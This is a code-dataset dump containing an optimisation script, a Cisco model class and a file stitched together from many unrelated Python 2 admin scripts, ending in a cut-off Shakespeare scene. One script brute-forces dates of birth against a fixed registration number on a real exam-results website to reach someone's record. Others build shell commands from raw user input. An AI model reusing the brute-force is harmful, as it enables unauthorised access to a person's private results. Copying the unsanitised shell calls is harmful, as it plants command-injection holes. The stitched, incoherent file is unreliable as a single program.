**space.inv_map_float_to_0_1(dict(zip(space.continuous_param_names, x))),
verbose=False,
points=5,
)
# Select a single PFT since we are only using single parameters.
dry_bal = dry_bal[:, 0]
assert len(dry_bal.shape) == 2
loss1 = calc_loss1(
dry_bal=dry_bal,
bins=bins,
hists=np.empty((dry_bal.shape[1], bins.size - 1)),
)
loss3 = calc_loss1(
dry_bal=np.diff(dry_bal, axis=0),
bins=diff_bins,
hists=np.empty((dry_bal.shape[1] - 1, diff_bins.size - 1)),
)
# At the same time, the `dry_bal` variable should fluctuate between high and low
# values (instead of e.g. monotonically increasing).
# Add a factor to enhance the weight of this metric.
loss2 = abs(
(
(
np.sum(np.diff(dry_bal, axis=0) < 0)
/ ((dry_bal.shape[0] - 1) * dry_bal.shape[1])
)
- 0.5
)
)
c_arr = np.array([loss1_c, loss2_c, loss3_c])
c_arr /= np.sum(c_arr)
loss_arr = np.array([loss1, loss2, loss3])
# logger.info(f"cs: {','.join(map(str, c_arr))}")
return np.sum(c_arr * loss_arr)
return to_optimise
if __name__ == "__main__":
# Create the figure and the line that we will manipulate
fig, ax = plt.subplots()
def plot_line(x):
dry_bal = get_fewer_climatological_grouped_dry_bal(
**space.inv_map_float_to_0_1(dict(zip(space.continuous_param_names, x))),
verbose=False,
points=5,
)
# Select a single PFT since we are only using single parameters.
dry_bal = dry_bal[:, 0]
ys = dry_bal[:, 0]
if not hasattr(plot_line, "line"):
(line,) = ax.plot(ys)
plot_line.line = line
else:
plot_line.line.set_ydata(ys)
plot_line(space.float_x0_mid)
ax.set_xlabel("Time [s]")
axcolor = "0.2"
ax.margins(x=0)
# adjust the main plot to make room for the sliders
plt.subplots_adjust(bottom=0.4)
def get_slider(*, ypos, label, valmin=0.0, valmax=1.0, valinit=0.5):
slider_ax = plt.axes([0.25, ypos, 0.65, 0.03], facecolor=axcolor)
return Slider(
ax=slider_ax,
label=label,
valmin=valmin,
valmax=valmax,
valinit=valinit,
)
loss1_slider = get_slider(ypos=0.1, label="loss1")
loss2_slider = get_slider(ypos=0.15, label="loss2")
loss3_slider = get_slider(ypos=0.2, label="loss3")
# The function to be called anytime a slider's value changes
def update(val):
logger.info("Starting minimisation")
result = minimize(
get_to_optimise(
loss1_c=loss1_slider.val,
loss2_c=loss2_slider.val,
loss3_c=loss3_slider.val,
),
x0=space.float_x0_mid,
method="L-BFGS-B",
jac=None,
bounds=[(0, 1)] * len(space.continuous_param_names),
options=dict(maxfun=1000, ftol=1e-6, eps=1e-4, disp=True),
)
opt_x = result.x
logger.info(f"Completed minimisation, success: {result.success}.")
plot_line(opt_x)
fig.canvas.draw_idle()
# register the update function with each slider
for slider in (loss1_slider, loss2_slider, loss3_slider):
slider.on_changed(update)
plt.show()
| [
"[email protected]"
] | |
d932f0e7d08cd74e5251f86ce83becb224158a88 | fdf0b68373e003bd9f4f65e1194e3e79d7e18f4c | /day2/class_property.py | d8071ea3cfd35a66da48ab8039b7eb7fe7b53d08 | [] | no_license | artheadsweden/python_advanced_nov_17 | 79b721077da3ba3bb630fde53832071d4e71c3ae | 20f9d99ba4b996414b36fb0efe7244895b3fd34b | refs/heads/master | 2021-03-24T11:08:43.733521 | 2017-11-22T23:32:23 | 2017-11-22T23:32:23 | 111,556,488 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | class P:
def __init__(self, x):
self.x = x
@property
def x(self):
return self.__x
@x.setter
def x(self, x):
if x < 0:
self.__x = 0
elif x > 1000:
self.__x = 1000
else:
self.__x = x
def main():
p = P(5000)
print(p.x)
p.x = 100000
print(p.x)
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
037b23778dce32e14f051a0ac32f92024cf4db53 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/rtflt/rule.py | a30362b62695f20e291ad7aa5994ee5f6c75ad0d | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 4,052 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class Rule(Mo):
meta = ClassMeta("cobra.model.rtflt.Rule")
meta.isAbstract = True
meta.moClassName = "rtfltRule"
meta.moClassName = "rtfltRule"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Rule"
meta.writeAccessMask = 0x401002001
meta.readAccessMask = 0x401002001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.superClasses.add("cobra.model.pol.Instr")
meta.superClasses.add("cobra.model.nw.FltRule")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.concreteSubClasses.add("cobra.model.rtpfx.Rule")
meta.concreteSubClasses.add("cobra.model.rtregcom.Rule")
meta.concreteSubClasses.add("cobra.model.rtmap.Rule")
meta.concreteSubClasses.add("cobra.model.rtextcom.Rule")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5581, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "name", "name", 3682, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
8fdbac9d7d5f752ea4c0a45d3df0c4e0601c2464 | c21faf85627b1cfd96494aac73cc40e5f11ebb46 | /results/test_298.py | e6108f25b7e2a9da4c59a316828f65a5060a581a | [] | no_license | ekkya/Cyclomatic-Complexity | d02c61e009087e7d51738e60605875741532b878 | 172db2efdd974f5abad964e335552aec974b47cb | refs/heads/master | 2021-08-28T17:13:14.718314 | 2017-12-12T22:04:13 | 2017-12-12T22:04:13 | 112,042,202 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 74,019 | py | """Get the number of each character in any given text.
Inputs:
A txt file -- You will be asked for an input file. Simply input the name
of the txt file in which you have the desired text.
"""
import pprint
import collections
def main():
file_input = input('File Name: ')
with open(file_input, 'r') as info:
count = collections.Counter(info.read().upper())
value = pprint.pformat(count)
print(value)
if __name__ == "__main__":
main()# Script Name : pscheck.py
# Author : Craig Richards
# Created : 19th December 2011
# Last Modified : 17th June 2013
# Version : 1.1
# Modifications : 1.1 - 17/06/13 - CR - Changed to functions, and check os before running the program
# Description : Process check on Nix boxes, diplsay formatted output from ps command
import commands, os, string
def ps():
program = raw_input("Enter the name of the program to check: ")
try:
#perform a ps command and assign results to a list
output = commands.getoutput("ps -f|grep " + program)
proginfo = string.split(output)
#display results
print "\n\
Full path:\t\t", proginfo[5], "\n\
Owner:\t\t\t", proginfo[0], "\n\
Process ID:\t\t", proginfo[1], "\n\
Parent process ID:\t", proginfo[2], "\n\
Time started:\t\t", proginfo[4]
except:
print "There was a problem with the program."
def main():
if os.name == "posix": # Unix/Linux/MacOS/BSD/etc
ps() # Call the function
elif os.name in ("nt", "dos", "ce"): # if the OS is windows
print "You need to be on Linux or Unix to run this"
if __name__ == '__main__':
main()from bs4 import BeautifulSoup
import datetime
import mechanize
import urllib2
# Create a Browser
b = mechanize.Browser()
# Disable loading robots.txt
b.set_handle_robots(False)
b.addheaders = [('User-agent',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;)')]
# Navigate
b.open('http://cbseresults.nic.in/jee/jee_2015.htm')
# Choose a form
b.select_form(nr=0)
# Fill it out
b['regno'] = '37000304'
currentdate = datetime.date(1997,3,10)
enddate = datetime.date(1998,4,1)
while currentdate <= enddate:
ct=0
#print currentdate
yyyymmdd = currentdate.strftime("%Y/%m/%d")
ddmmyyyy = yyyymmdd[8:] + "/" + yyyymmdd[5:7] + "/" +yyyymmdd[:4]
print(ddmmyyyy)
b.open('http://cbseresults.nic.in/jee/jee_2015.htm')
b.select_form(nr=0)
b['regno'] = '37000304'
b['dob'] = ddmmyyyy
fd = b.submit()
#print(fd.read())
soup = BeautifulSoup(fd.read(),'html.parser')
for writ in soup.find_all('table'):
ct = ct + 1;
#print (ct)
if ct == 6:
print("---fail---")
else:
print("--true--")
break;
currentdate += datetime.timedelta(days=1)
#print fd.read()# Script Name : new_script.py
# Author : Craig Richards
# Created : 20th November 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This will create a new basic template for a new script
import os # Load the library module
import sys # Load the library module
import datetime # Load the library module
text = '''You need to pass an argument for the new script you want to create, followed by the script name. You can use
-python : Python Script
-bash : Bash Script
-ksh : Korn Shell Script
-sql : SQL Script'''
if len(sys.argv) < 3:
print text
sys.exit()
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv:
print text
sys.exit()
else:
if '-python' in sys.argv[1]:
config_file = "python.cfg"
extension = ".py"
elif '-bash' in sys.argv[1]:
config_file = "bash.cfg"
extension = ".bash"
elif '-ksh' in sys.argv[1]:
config_file = "ksh.cfg"
extension = ".ksh"
elif '-sql' in sys.argv[1]:
config_file = "sql.cfg"
extension = ".sql"
else:
print 'Unknown option - ' + text
sys.exit()
confdir = os.getenv("my_config")
scripts = os.getenv("scripts")
dev_dir = "Development"
newfile = sys.argv[2]
output_file = (newfile + extension)
outputdir = os.path.join(scripts,dev_dir)
script = os.path.join(outputdir, output_file)
input_file = os.path.join(confdir,config_file)
old_text = " Script Name : "
new_text = (" Script Name : " + output_file)
if not(os.path.exists(outputdir)):
os.mkdir(outputdir)
newscript = open(script, 'w')
input = open(input_file, 'r')
today = datetime.date.today()
old_date = " Created :"
new_date = (" Created : " + today.strftime("%d %B %Y"))
for line in input:
line = line.replace(old_text, new_text)
line = line.replace(old_date, new_date)
newscript.write(line)
# Script Name : osinfo.py
# Authors : {'geekcomputers': 'Craig Richards', 'dmahugh': 'Doug Mahugh','rutvik1010':'Rutvik Narayana Nadimpally','y12uc231': 'Satyapriya Krishna', 'minto4644':'Mohit Kumar'}
# Created : 5th April 2012
# Last Modified : July 19 2016
# Version : 1.0
# Modification 1 : Changed the profile to list again. Order is important. Everytime we run script we don't want to see different ordering.
# Modification 2 : Fixed the AttributeError checking for all properties. Using hasttr().
# Modification 3 : Removed ': ' from properties inside profile.
# Description : Displays some information about the OS you are running this script on
import platform as pl
profile = [
'architecture',
'linux_distribution',
'mac_ver',
'machine',
'node',
'platform',
'processor',
'python_build',
'python_compiler',
'python_version',
'release',
'system',
'uname',
'version',
]
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
for key in profile:
if hasattr(pl, key):
print(key + bcolors.BOLD + ": " + str(getattr(pl, key)()) + bcolors.ENDC)
import csv
import glob
import os
import pdb
import pandas as pd
def main():
directory = []
for dirs in os.walk("."):
directory.append(dirs)
folders = directory[0][1]
for ff in folders:
if ff != ".git":
allFiles = glob.glob(ff + "/*.csv")
frame = pd.DataFrame()
dfs = []
for files in allFiles:
df = pd.read_csv(files, index_col=None, header=0)
dfs.append(df)
frame = pd.concat(dfs)
frame.to_csv(ff + "/results.csv")
main()# Script Name : logs.py
# Author : Craig Richards
# Created : 13th October 2011
# Last Modified : 14 February 2016
# Version : 1.2
#
# Modifications : 1.1 - Added the variable zip_program so you can set it for the zip program on whichever OS, so to run on a different OS just change the locations of these two variables.
# : 1.2 - Tidy up comments and syntax
#
# Description : This script will search for all *.log files in the given directory, zip them using the program you specify and then date stamp them
import os # Load the Library Module
from time import strftime # Load just the strftime Module from Time
logsdir = "c:\puttylogs" # Set the Variable logsdir
zip_program = "zip.exe" # Set the Variable zip_program - 1.1
for files in os.listdir(logsdir): # Find all the files in the directory
if files.endswith(".log"): # Check to ensure the files in the directory end in .log
files1 = files + "." + strftime("%Y-%m-%d") + ".zip" # Create the Variable files1, this is the files in the directory, then we add a suffix with the date and the zip extension
os.chdir(logsdir) # Change directory to the logsdir
os.system(zip_program + " " + files1 +" "+ files) # Zip the logs into dated zip files for each server. - 1.1
os.remove(files) # Remove the original log files# Script Name : check_for_sqlite_files.py
# Author : Craig Richards
# Created : 07 June 2013
# Last Modified : 14 February 2016
# Version : 1.0.1
# Modifications : 1.0.1 - Remove unecessary line and variable on Line 21
# Description : Scans directories to check if there are any sqlite files in there
import os
def isSQLite3(filename):
from os.path import isfile, getsize
if not isfile(filename):
return False
if getsize(filename) < 100: # SQLite database file header is 100 bytes
return False
else:
fd = open(filename, 'rb')
Header = fd.read(100)
fd.close()
if Header[0:16] == 'SQLite format 3\000':
return True
else:
return False
log=open('sqlite_audit.txt','w')
for r,d,f in os.walk(r'.'):
for files in f:
if isSQLite3(files):
print files
print "[+] '%s' **** is a SQLITE database file **** " % os.path.join(r,files)
log.write("[+] '%s' **** is a SQLITE database file **** " % files+'\n')
else:
log.write("[-] '%s' is NOT a sqlite database file" % os.path.join(r,files)+'\n')
log.write("[-] '%s' is NOT a sqlite database file" % files+'\n')
# Script Name : create_dir_if_not_there.py
# Author : Craig Richards
# Created : 09th January 2012
# Last Modified : 22nd October 2015
# Version : 1.0.1
# Modifications : Added exceptions
# : 1.0.1 Tidy up comments and syntax
#
# Description : Checks to see if a directory exists in the users home directory, if not then create it
import os # Import the OS module
try:
home = os.path.expanduser("~") # Set the variable home by expanding the users set home directory
print home # Print the location
if not os.path.exists(home + '/testdir'):
os.makedirs(home + '/testdir') # If not create the directory, inside their home directory
except Exception, e:
print e# Script Name : move_files_over_x_days.py
# Author : Craig Richards
# Created : 8th December 2011
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This will move all the files from the src directory that are over 240 days old to the destination directory.
import shutil
import sys
import time
import os
src = 'u:\\test' # Set the source directory
dst = 'c:\\test' # Set the destination directory
now = time.time() # Get the current time
for f in os.listdir(src): # Loop through all the files in the source directory
if os.stat(f).st_mtime < now - 240 * 86400: # Work out how old they are, if they are older than 240 days old
if os.path.isfile(f): # Check it's a file
shutil.move(f, dst) # Move the files
# Script Name : sqlite_table_check.py
# Author : Craig Richards
# Created : 07 June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Checks the main SQLITE database to ensure all the tables should exist
import sqlite3
import sys
import os
dropbox = os.getenv("dropbox")
config = os.getenv("my_config")
dbfile = ("Databases\jarvis.db")
listfile = ("sqlite_master_table.lst")
master_db = os.path.join(dropbox, dbfile)
config_file = os.path.join(config, listfile)
tablelist = open(config_file,'r');
conn = sqlite3.connect(master_db)
cursor = conn.cursor()
cursor.execute('SELECT SQLITE_VERSION()')
data = cursor.fetchone()
if str(data) == "(u'3.6.21',)":
print ("\nCurrently " + master_db + " is on SQLite version: %s" % data + " - OK -\n")
else:
print ("\nDB On different version than master version - !!!!! \n")
conn.close()
print ("\nCheckling " + master_db + " against " + config_file + "\n")
for table in tablelist.readlines():
conn = sqlite3.connect(master_db)
cursor = conn.cursor()
cursor.execute("select count(*) from sqlite_master where name = ?",(table.strip(), ))
res = cursor.fetchone()
if (res[0]):
print ('[+] Table : ' + table.strip() + ' exists [+]')
else:
print ('[-] Table : ' + table.strip() + ' does not exist [-]')
# Script Name : puttylogs.py
# Author : Craig Richards
# Created : 13th October 2011
# Last Modified : 29th February 2012
# Version : 1.2
# Modifications : 1.1 - Added the variable zip_program so you can set it for the zip program on whichever OS, so to run on a different OS just change the locations of these two variables.
# : 1.2 - 29-02-12 - CR - Added shutil module and added one line to move the zipped up logs to the zipped_logs directory
# Description : Zip up all the logs in the given directory
import os # Load the Library Module
import shutil # Load the Library Module - 1.2
from time import strftime # Load just the strftime Module from Time
logsdir="c:\logs\puttylogs" # Set the Variable logsdir
zipdir="c:\logs\puttylogs\zipped_logs" # Set the Variable zipdir - 1.2
zip_program="zip.exe" # Set the Variable zip_program - 1.1
for files in os.listdir(logsdir): # Find all the files in the directory
if files.endswith(".log"): # Check to ensure the files in the directory end in .log
files1=files+"."+strftime("%Y-%m-%d")+".zip" # Create the Variable files1, this is the files in the directory, then we add a suffix with the date and the zip extension
os.chdir(logsdir) # Change directory to the logsdir
os.system(zip_program + " " + files1 +" "+ files) # Zip the logs into dated zip files for each server. - 1.1
shutil.move(files1, zipdir) # Move the zipped log files to the zipped_logs directory - 1.2
os.remove(files) # Remove the original log files
# Script Name : daily_checks.py
# Author : Craig Richards
# Created : 07th December 2011
# Last Modified : 01st May 2013
# Version : 1.5
#
# Modifications : 1.1 Removed the static lines for the putty sessions, it now reads a file, loops through and makes the connections.
# : 1.2 Added a variable filename=sys.argv[0] , as when you use __file__ it errors when creating an exe with py2exe.
# : 1.3 Changed the server_list.txt file name and moved the file to the config directory.
# : 1.4 Changed some settings due to getting a new pc
# : 1.5 Tidy comments and syntax
#
# Description : This simple script loads everything I need to carry out the daily checks for our systems.
import platform # Load Modules
import os
import subprocess
import sys
from time import strftime # Load just the strftime Module from Time
def clear_screen(): # Function to clear the screen
if os.name == "posix": # Unix/Linux/MacOS/BSD/etc
os.system('clear') # Clear the Screen
elif os.name in ("nt", "dos", "ce"): # DOS/Windows
os.system('CLS') # Clear the Screen
def print_docs(): # Function to print the daily checks automatically
print ("Printing Daily Check Sheets:")
# The command below passes the command line string to open word, open the document, print it then close word down
subprocess.Popen(["C:\\Program Files (x86)\Microsoft Office\Office14\winword.exe", "P:\\\\Documentation\\Daily Docs\\Back office Daily Checks.doc", "/mFilePrintDefault", "/mFileExit"]).communicate()
def putty_sessions(): # Function to load the putty sessions I need
for server in open(conffilename): # Open the file server_list.txt, loop through reading each line - 1.1 -Changed - 1.3 Changed name to use variable conffilename
subprocess.Popen(('putty -load '+server)) # Open the PuTTY sessions - 1.1
def rdp_sessions():
print ("Loading RDP Sessions:")
subprocess.Popen("mstsc eclr.rdp") # Open up a terminal session connection and load the euroclear session
def euroclear_docs():
# The command below opens IE and loads the Euroclear password document
subprocess.Popen('"C:\\Program Files\\Internet Explorer\\iexplore.exe"' '"file://fs1\pub_b\Pub_Admin\Documentation\Settlements_Files\PWD\Eclr.doc"')
# End of the functions
# Start of the Main Program
def main():
filename = sys.argv[0] # Create the variable filename
confdir = os.getenv("my_config") # Set the variable confdir from the OS environment variable - 1.3
conffile = ('daily_checks_servers.conf') # Set the variable conffile - 1.3
conffilename = os.path.join(confdir, conffile) # Set the variable conffilename by joining confdir and conffile together - 1.3
clear_screen() # Call the clear screen function
# The command below prints a little welcome message, as well as the script name, the date and time and where it was run from.
print ("Good Morning " + os.getenv('USERNAME') + ", "+
filename, "ran at", strftime("%Y-%m-%d %H:%M:%S"), "on",platform.node(), "run from",os.getcwd())
print_docs() # Call the print_docs function
putty_sessions() # Call the putty_session function
rdp_sessions() # Call the rdp_sessions function
euroclear_docs() # Call the euroclear_docs function
if __name__ == "__main__":
main()
import serial
import sys
#A serial port-scanner for linux and windows platforms
#Author: Julio César Echeverri Marulanda
#e-mail: [email protected]
#blog: blogdelingeniero1.wordpress.com
#You should have installed the PySerial module to use this method.
#You can install pyserial with the following line: pip install pyserial
def ListAvailablePorts():
#This function return a list containing the string names for Virtual Serial Ports
#availables in the computer (this function works only for Windows & Linux Platforms but you can extend it)
#if there isn't available ports, returns an empty List
AvailablePorts = []
platform = sys.platform
if platform == 'win32':
for i in range(255):
try:
ser = serial.Serial(i,9600)
except serial.serialutil.SerialException:
pass
else:
AvailablePorts.append(ser.portstr)
ser.close()
elif platform == 'linux':
for i in range(0,255):
try:
ser = serial.Serial('/dev/ttyUSB'+str(i))
except serial.serialutil.SerialException:
pass
else:
AvailablePorts.append('/dev/ttyUSB'+str(i))
ser.close()
else:
print '''This method was developed only for linux and windows
the current platform isn't recognised'''
return AvailablePorts
# EXAMPLE OF HOW IT WORKS
# if an Arduino is connected to the computer, the port will be show in the terminal
# print ListAvailablePorts()# Script Name : nslookup_check.py
# Author : Craig Richards
# Created : 5th January 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This very simple script opens the file server_list.txt and the does an nslookup for each one to check the DNS entry
import subprocess # Import the subprocess module
for server in open('server_list.txt'): # Open the file and read each line
subprocess.Popen(('nslookup ' + server)) # Run the nslookup command for each server in the listimport pprint
info = '''SCENE I. Yorkshire. Gaultree Forest.
Enter the ARCHBISHOP OF YORK, MOWBRAY, LORD HASTINGS, and others
ARCHBISHOP OF YORK
What is this forest call'd?
HASTINGS
'Tis Gaultree Forest, an't shall please your grace.
ARCHBISHOP OF YORK
Here stand, my lords; and send discoverers forth
To know the numbers of our enemies.
HASTINGS
We have sent forth already.
ARCHBISHOP OF YORK
'Tis well done.
My friends and brethren in these great affairs,
I must acquaint you that I have received
New-dated letters from Northumberland;
Their cold intent, tenor and substance, thus:
Here doth he wish his person, with such powers
As might hold sortance with his quality,
The which he could not levy; whereupon
He is retired, to ripe his growing fortunes,
To Scotland: and concludes in hearty prayers
That your attempts may overlive the hazard
And fearful melting of their opposite.
MOWBRAY
Thus do the hopes we have in him touch ground
And dash themselves to pieces.
Enter a Messenger
HASTINGS
Now, what news?
Messenger
West of this forest, scarcely off a mile,
In goodly form comes on the enemy;
And, by the ground they hide, I judge their number
Upon or near the rate of thirty thousand.
MOWBRAY
The just proportion that we gave them out
Let us sway on and face them in the field.
ARCHBISHOP OF YORK
What well-appointed leader fronts us here?
Enter WESTMORELAND
MOWBRAY
I think it is my Lord of Westmoreland.
WESTMORELAND
Health and fair greeting from our general,
The prince, Lord John and Duke of Lancaster.
ARCHBISHOP OF YORK
Say on, my Lord of Westmoreland, in peace:
What doth concern your coming?
WESTMORELAND
Then, my lord,
Unto your grace do I in chief address
The substance of my speech. If that rebellion
Came like itself, in base and abject routs,
Led on by bloody youth, guarded with rags,
And countenanced by boys and beggary,
I say, if damn'd commotion so appear'd,
In his true, native and most proper shape,
You, reverend father, and these noble lords
Had not been here, to dress the ugly form
Of base and bloody insurrection
With your fair honours. You, lord archbishop,
Whose see is by a civil peace maintained,
Whose beard the silver hand of peace hath touch'd,
Whose learning and good letters peace hath tutor'd,
Whose white investments figure innocence,
The dove and very blessed spirit of peace,
Wherefore do you so ill translate ourself
Out of the speech of peace that bears such grace,
Into the harsh and boisterous tongue of war;
Turning your books to graves, your ink to blood,
Your pens to lances and your tongue divine
To a trumpet and a point of war?
ARCHBISHOP OF YORK
Wherefore do I this? so the question stands.
Briefly to this end: we are all diseased,
And with our surfeiting and wanton hours
Have brought ourselves into a burning fever,
And we must bleed for it; of which disease
Our late king, Richard, being infected, died.
But, my most noble Lord of Westmoreland,
I take not on me here as a physician,
Nor do I as an enemy to peace
Troop in the throngs of military men;
But rather show awhile like fearful war,
To diet rank minds sick of happiness
And purge the obstructions which begin to stop
Our very veins of life. Hear me more plainly.
I have in equal balance justly weigh'd
What wrongs our arms may do, what wrongs we suffer,
And find our griefs heavier than our offences.
We see which way the stream of time doth run,
And are enforced from our most quiet there
By the rough torrent of occasion;
And have the summary of all our griefs,
When time shall serve, to show in articles;
Which long ere this we offer'd to the king,
And might by no suit gain our audience:
When we are wrong'd and would unfold our griefs,
We are denied access unto his person
Even by those men that most have done us wrong.
The dangers of the days but newly gone,
Whose memory is written on the earth
With yet appearing blood, and the examples
Of every minute's instance, present now,
Hath put us in these ill-beseeming arms,
Not to break peace or any branch of it,
But to establish here a peace indeed,
Concurring both in name and quality.
WESTMORELAND
When ever yet was your appeal denied?
Wherein have you been galled by the king?
What peer hath been suborn'd to grate on you,
That you should seal this lawless bloody book
Of forged rebellion with a seal divine
And consecrate commotion's bitter edge?
ARCHBISHOP OF YORK
My brother general, the commonwealth,
To brother born an household cruelty,
I make my quarrel in particular.
WESTMORELAND
There is no need of any such redress;
Or if there were, it not belongs to you.
MOWBRAY
Why not to him in part, and to us all
That feel the bruises of the days before,
And suffer the condition of these times
To lay a heavy and unequal hand
Upon our honours?
WESTMORELAND
O, my good Lord Mowbray,
Construe the times to their necessities,
And you shall say indeed, it is the time,
And not the king, that doth you injuries.
Yet for your part, it not appears to me
Either from the king or in the present time
That you should have an inch of any ground
To build a grief on: were you not restored
To all the Duke of Norfolk's signories,
Your noble and right well remember'd father's?
MOWBRAY
What thing, in honour, had my father lost,
That need to be revived and breathed in me?
The king that loved him, as the state stood then,
Was force perforce compell'd to banish him:
And then that Harry Bolingbroke and he,
Being mounted and both roused in their seats,
Their neighing coursers daring of the spur,
Their armed staves in charge, their beavers down,
Their eyes of fire sparking through sights of steel
And the loud trumpet blowing them together,
Then, then, when there was nothing could have stay'd
My father from the breast of Bolingbroke,
O when the king did throw his warder down,
His own life hung upon the staff he threw;
Then threw he down himself and all their lives
That by indictment and by dint of sword
Have since miscarried under Bolingbroke.
WESTMORELAND
You speak, Lord Mowbray, now you know not what.
The Earl of Hereford was reputed then
In England the most valiant gentlemen:
Who knows on whom fortune would then have smiled?
But if your father had been victor there,
He ne'er had borne it out of Coventry:
For all the country in a general voice
Cried hate upon him; and all their prayers and love
Were set on Hereford, whom they doted on
And bless'd and graced indeed, more than the king.
But this is mere digression from my purpose.
Here come I from our princely general
To know your griefs; to tell you from his grace
That he will give you audience; and wherein
It shall appear that your demands are just,
You shall enjoy them, every thing set off
That might so much as think you enemies.
MOWBRAY
But he hath forced us to compel this offer;
And it proceeds from policy, not love.
WESTMORELAND
Mowbray, you overween to take it so;
This offer comes from mercy, not from fear:
For, lo! within a ken our army lies,
Upon mine honour, all too confident
To give admittance to a thought of fear.
Our battle is more full of names than yours,
Our men more perfect in the use of arms,
Our armour all as strong, our cause the best;
Then reason will our heart should be as good
Say you not then our offer is compell'd.
MOWBRAY
Well, by my will we shall admit no parley.
WESTMORELAND
That argues but the shame of your offence:
A rotten case abides no handling.
HASTINGS
Hath the Prince John a full commission,
In very ample virtue of his father,
To hear and absolutely to determine
Of what conditions we shall stand upon?
WESTMORELAND
That is intended in the general's name:
I muse you make so slight a question.
ARCHBISHOP OF YORK
Then take, my Lord of Westmoreland, this schedule,
For this contains our general grievances:
Each several article herein redress'd,
All members of our cause, both here and hence,
That are insinew'd to this action,
Acquitted by a true substantial form
And present execution of our wills
To us and to our purposes confined,
We come within our awful banks again
And knit our powers to the arm of peace.
WESTMORELAND
This will I show the general. Please you, lords,
In sight of both our battles we may meet;
And either end in peace, which God so frame!
Or to the place of difference call the swords
Which must decide it.
ARCHBISHOP OF YORK
My lord, we will do so.
Exit WESTMORELAND
MOWBRAY
There is a thing within my bosom tells me
That no conditions of our peace can stand.
HASTINGS
Fear you not that: if we can make our peace
Upon such large terms and so absolute
As our conditions shall consist upon,
Our peace shall stand as firm as rocky mountains.
MOWBRAY
Yea, but our valuation shall be such
That every slight and false-derived cause,
Yea, every idle, nice and wanton reason
Shall to the king taste of this action;
That, were our royal faiths martyrs in love,
We shall be winnow'd with so rough a wind
That even our corn shall seem as light as chaff
And good from bad find no partition.
ARCHBISHOP OF YORK
No, no, my lord. Note this; the king is weary
Of dainty and such picking grievances:
For he hath found to end one doubt by death
Revives two greater in the heirs of life,
And therefore will he wipe his tables clean
And keep no tell-tale to his memory
That may repeat and history his loss
To new remembrance; for full well he knows
He cannot so precisely weed this land
As his misdoubts present occasion:
His foes are so enrooted with his friends
That, plucking to unfix an enemy,
He doth unfasten so and shake a friend:
So that this land, like an offensive wife
That hath enraged him on to offer strokes,
As he is striking, holds his infant up
